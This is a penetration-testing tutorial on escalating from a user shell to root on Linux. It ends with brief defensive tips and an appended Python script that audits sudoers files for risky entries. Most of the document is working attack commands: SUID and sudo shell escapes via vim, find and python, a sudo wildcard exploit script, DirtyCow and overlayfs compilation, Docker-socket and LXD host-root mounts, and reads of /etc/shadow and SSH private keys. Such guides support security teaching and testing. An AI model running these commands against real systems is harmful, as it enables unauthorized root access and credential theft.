Linux Privilege Escalation: From User to Root
Master Linux privilege escalation techniques used in real-world penetration tests. Learn systematic enumeration and exploitation methods.
Linux Privilege Escalation Fundamentals
Privilege escalation is often the critical step that turns a limited shell into full system compromise. This guide covers systematic approaches to escalating privileges on Linux systems, from basic enumeration to advanced exploitation techniques.
Initial Enumeration
Start with comprehensive system enumeration to identify potential attack vectors:
```bash
# System information
uname -a
cat /etc/issue
cat /etc/*release*
# Current user and groups
id
groups
whoami
# Sudo permissions
sudo -l
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# World-writable files
find / -perm -2 -type f 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l
```

SUID Binary Exploitation
SUID binaries running as root are prime targets for privilege escalation:
```bash
# Common exploitable SUID binaries
/bin/bash -p
/usr/bin/vim -c ':!/bin/bash'
/usr/bin/find . -exec /bin/bash -p \; -quit
/usr/bin/nmap --interactive   # only in old Nmap releases that still ship interactive mode
/usr/bin/python -c 'import os; os.system("/bin/bash")'
# Custom SUID binary analysis
# (the kernel drops the setuid bit for a traced process, so ltrace/strace show
#  the binary's logic, not its privileged behaviour)
strings /path/to/suid/binary
ltrace /path/to/suid/binary
strace /path/to/suid/binary
```

Sudo Misconfigurations
Sudo misconfigurations are extremely common. Look for these patterns:
```bash
# Dangerous sudo entries (as they appear in /etc/sudoers)
user ALL=(ALL) NOPASSWD: /bin/bash
user ALL=(ALL) NOPASSWD: /usr/bin/vim
user ALL=(ALL) NOPASSWD: /usr/bin/find
user ALL=(ALL) NOPASSWD: /usr/bin/python*
# Wildcard exploitation
# If sudo allows: /home/user/scripts/*.sh
echo '#!/bin/bash' > /home/user/scripts/exploit.sh
echo '/bin/bash' >> /home/user/scripts/exploit.sh
chmod +x /home/user/scripts/exploit.sh
sudo /home/user/scripts/exploit.sh
# Environment variable exploitation (needs SETENV or a permissive env_keep)
sudo -E /vulnerable/binary
```

Kernel Exploits
When local misconfigurations aren't available, kernel exploits can provide root access:
```bash
# Kernel version enumeration
uname -r
cat /proc/version
dmesg | grep Linux
# Common kernel exploits
# DirtyCow (CVE-2016-5195)
gcc -pthread dirty.c -o dirty -lcrypt
# Overlayfs (CVE-2015-1328)
gcc ofs.c -o ofs
# Use linux-exploit-suggester
./linux-exploit-suggester.sh
# Check for container escape opportunities
cat /proc/1/cgroup
ls -la /dev | grep -E "(docker|lxc)"
```

Service and Process Exploitation
Running services often provide privilege escalation opportunities:
```bash
# Process enumeration
ps aux
ps -ef
pstree
# Network services
netstat -tulpn
ss -tulpn
# Check for MySQL running as root
ps aux | grep mysql
cat /etc/mysql/my.cnf
# Docker exploitation (requires access to the Docker socket)
docker -H unix:///var/run/docker.sock run -v /:/hostfs -it ubuntu chroot /hostfs bash
# LXD group membership
lxd init
lxc init ubuntu privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/bash
```

File System Analysis
File permissions and configurations often reveal privilege escalation paths:
```bash
# Writable system files
find / -writable -type f 2>/dev/null | grep -v /proc | head -20
# Password files
cat /etc/passwd
cat /etc/shadow
cat /etc/group
# SSH keys
find / -name "*.pem" 2>/dev/null
find / -name "*id_rsa*" 2>/dev/null
find / -name "*id_dsa*" 2>/dev/null
# Configuration files
find /etc -readable -type f 2>/dev/null | head -30
grep -r "password" /etc/ 2>/dev/null
# Log files (may contain credentials)
find /var/log -readable -type f 2>/dev/null
```

Automated Tools
Use these tools to automate privilege escalation enumeration:
```bash
# LinEnum
./LinEnum.sh
# LinPEAS
./linpeas.sh
# Linux Smart Enumeration
./lse.sh
# PEASS-ng
python3 linpeas.py
# Unix Privesc Check
./unix-privesc-check standard
```

Advanced Techniques
- LD_PRELOAD exploitation: Hijack shared libraries for privilege escalation
- PATH hijacking: Exploit scripts that don't use absolute paths
- Capabilities abuse: Exploit Linux capabilities assigned to binaries
- NFS exports: Mount exported filesystems with no_root_squash
- Wildcard injection: Exploit shell wildcards in cron jobs or scripts
Defensive Recommendations
Understanding privilege escalation helps defenders secure their systems:
- Regularly audit SUID binaries and remove unnecessary ones
- Implement proper sudo configurations with minimal required permissions
- Keep kernels updated and apply security patches promptly
- Monitor for unusual process execution and privilege changes
- Use tools like HackFast to track and correlate privilege escalation attempts across your infrastructure
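As an added example that is not part of the original post, the following Python audit turns the sudo patterns from the "Sudo Misconfigurations" section into a check a defender can run against sudoers content: NOPASSWD entries for shell-escape binaries, wildcards in command paths, SETENV tags and env_keep of dynamic-loader variables. The binary list and the SAMPLE_SUDOERS text are constructed for the demonstration; in practice feed it the contents of /etc/sudoers and /etc/sudoers.d/*.

```python
import re
from pathlib import PurePosixPath
# Binaries this page lists as shell escapes under SUID/sudo abuse: a NOPASSWD
# entry for any of them is as dangerous as "NOPASSWD: /bin/bash".
SHELL_ESCAPE_BINARIES = {"bash", "sh", "dash", "vim", "vi", "find", "nmap",
                         "python", "python2", "python3", "perl", "less", "awk"}
# user host=(runas) TAG: cmd, cmd  (Defaults, aliases and comments handled separately)
SPEC_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?((?:[A-Z_]+:\s*)*)(.+)$")
# Constructed sample sudoers content for the demonstration, not from a real host.
SAMPLE_SUDOERS = """\
Defaults env_keep += "LD_PRELOAD"
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
deploy ALL=(ALL) NOPASSWD: /usr/bin/vim
backup ALL=(root) NOPASSWD: /home/user/scripts/*.sh
ops ALL=(ALL) NOPASSWD: /usr/bin/python*
www ALL=(ALL) SETENV: /usr/bin/systemctl restart nginx
alice ALL=(ALL) /usr/sbin/reboot
"""

def command_name(cmd):
    name = PurePosixPath(cmd.split()[0]).name  # '/usr/bin/python*' -> 'python*'
    return name if name.startswith("*") else name.rstrip("*")  # -> 'python'

def audit_sudoers(text):
    """Return (severity, line, reason) findings for the risky patterns above."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drops comments (and #include lines)
        if not line or line.split()[0].endswith("_Alias"):
            continue
        if line.startswith("Defaults"):
            if "LD_PRELOAD" in line or "LD_LIBRARY_PATH" in line:
                findings.append(("HIGH", line, "env_keep preserves dynamic-loader variables"))
            continue
        m = SPEC_RE.match(line)
        if not m or m.group(1) == "root":
            continue
        tags, cmds = m.group(4), m.group(5)
        nopasswd = "NOPASSWD:" in tags
        if "SETENV:" in tags:
            findings.append(("HIGH", line, "SETENV lets the caller override the environment"))
        for cmd in (c.strip() for c in cmds.split(",")):
            if cmd == "ALL":
                findings.append(("CRITICAL" if nopasswd else "MEDIUM", line, "unrestricted command set"))
            elif "*" in cmd:
                findings.append(("HIGH", line, f"wildcard in {cmd} matches more than the intended path"))
            if command_name(cmd) in SHELL_ESCAPE_BINARIES:
                findings.append(("CRITICAL" if nopasswd else "HIGH", line, f"{cmd} can spawn a shell as the target user"))
    return findings
```

The parser covers plain user specifications only; entries expressed through Cmnd_Alias or Runas_Alias are skipped rather than expanded.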